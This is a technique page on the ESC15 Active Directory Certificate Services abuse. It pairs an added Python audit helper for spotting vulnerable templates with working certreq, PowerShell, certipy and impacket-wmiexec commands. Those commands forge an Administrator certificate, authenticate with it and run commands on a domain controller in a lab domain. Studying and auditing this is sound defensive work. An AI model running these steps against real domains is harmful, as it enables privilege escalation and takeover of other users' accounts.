
ESC15

Unlike ESC1, ESC15 occurs when a certificate template:

  • Allows low-privileged user enrollment.
  • Allows the enrollee to specify an arbitrary SAN.
  • Uses Schema Version 1.
  • Does not include the Client Authentication EKU, e.g.:
    Client Authentication               : False

Because the CA honours an Application Policies extension supplied in the CSR for Schema Version 1 templates, the requester can inject the Certificate Request Agent policy and then request certificates on behalf of other users (or inject Client Authentication directly, as the examples below do), bypassing the template's Client Authentication requirement.
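As an added defensive check (not part of the original page or of Certipy), the helper below evaluates these four conditions over each template's LDAP attributes. It assumes the caller has already resolved the template's Enroll ACEs into an `enroll` list of principal names; the sample templates and the set of low-privileged principals are constructed.

```python
# Added audit helper: flags templates meeting the four ESC15 preconditions,
# working from the template's LDAP attributes (msPKI-* and pKIExtendedKeyUsage).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CLIENT_AUTH_OID = "1.3.6.1.5.5.7.3.2"           # Client Authentication EKU
# Assumed set of principals counted as low-privileged; adjust for your domain.
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def esc15_reasons(template):
    """Return the ESC15 preconditions this template meets (all four => candidate)."""
    reasons = []
    if template.get("msPKI-Template-Schema-Version") == 1:
        reasons.append("schema version 1 (CA honours Application Policies in the CSR)")
    if template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject/SAN")
    if CLIENT_AUTH_OID not in template.get("pKIExtendedKeyUsage", []):
        reasons.append("no Client Authentication EKU")
    # "enroll" is an assumed, pre-resolved list of principals holding Enroll rights.
    low_priv = sorted(set(template.get("enroll", [])) & LOW_PRIV_PRINCIPALS)
    if low_priv:
        reasons.append("enrollable by " + ", ".join(low_priv))
    return reasons


def find_esc15(templates):
    """Map template name -> reasons, for templates meeting all four conditions."""
    findings = {}
    for t in templates:
        reasons = esc15_reasons(t)
        if len(reasons) == 4:
            findings[t["name"]] = reasons
    return findings


# Constructed sample data (not from a real CA); names follow those used on this page.
SAMPLE_TEMPLATES = [
    {"name": "WebServer", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": 0x00000001,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],      # Server Authentication only
     "enroll": ["Domain Admins", "Domain Users"]},        # constructed misconfiguration
    {"name": "User", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": 0xA6000000,           # subject built from AD, not CSR
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "enroll": ["Domain Users"]},
    {"name": "CustomV2", "msPKI-Template-Schema-Version": 2,
     "msPKI-Certificate-Name-Flag": 0x00000001,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "enroll": ["Domain Users"]},
]

if __name__ == "__main__":
    for name, reasons in find_esc15(SAMPLE_TEMPLATES).items():
        print(f"[ESC15] {name}: " + "; ".join(reasons))
```

Only WebServer is reported, because User keeps the Client Authentication EKU and does not let the enrollee supply the subject, and CustomV2 is a Schema Version 2 template.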

Windows

Use certreq with a .inf config file

You can manually craft a CSR with a malicious Application Policies extension.

Create .inf file

[Version]
Signature="$Windows NT$"

[NewRequest]
Subject = "CN=Administrator"
KeyLength = 2048
Exportable = TRUE
KeySpec = 1
KeyUsage = 0xA0
MachineKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
HashAlgorithm = sha256
RequestType = PKCS10
SMIME = FALSE

[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=Administrator@minions.com"

1.3.6.1.4.1.311.21.10 = "{text}"
_continue_ = "1.3.6.1.5.5.7.3.2"  ; ← This is the Client Authentication OID

Generate request

certreq -new esc15.inf esc15.req

Submit request

certreq -submit -config "<CAHostname>\<CAName>" esc15.req esc15.cer

Convert to PFX

certreq -accept esc15.cer
# OR manually export it to a .pfx file

Now you can use the certificate with Rubeus or Certipy.


Use PSCertificateEnrollment (PowerShell Module)

This is a more modern and scriptable way to generate a CSR carrying the injected Application Policies extension.

Import-Module PSCertificateEnrollment
$Csr = New-CertificateRequest -Upn "Administrator@minions.com" -ApplicationPolicy ClientAuthentication
$Csr | Get-IssuedCertificate -ConfigString "minions-CA\minions-DC" -CertificateTemplate "WebServer"

This produces and submits a CSR that includes the malicious Application Policies extension.


Linux

Requesting a certificate with an injected Application Policies extension

Using friendly name (Certificate Request Agent)

bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -application-policies 'Certificate Request Agent'

Using OID (here the Client Authentication OID, 1.3.6.1.5.5.7.3.2)

bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -application-policies '1.3.6.1.5.5.7.3.2'

Requesting a certificate on behalf of the Administrator account (using the Certificate Request Agent certificate obtained above, user1.pfx)

bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -on-behalf-of 'minions\administrator' -pfx user1.pfx

Authenticating with the obtained certificate

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <dc_ip>

Verifying ticket functionality

bob$ KRB5CCNAME=<ccache_file> impacket-wmiexec -k -no-pass <dc_fqdn>

Resources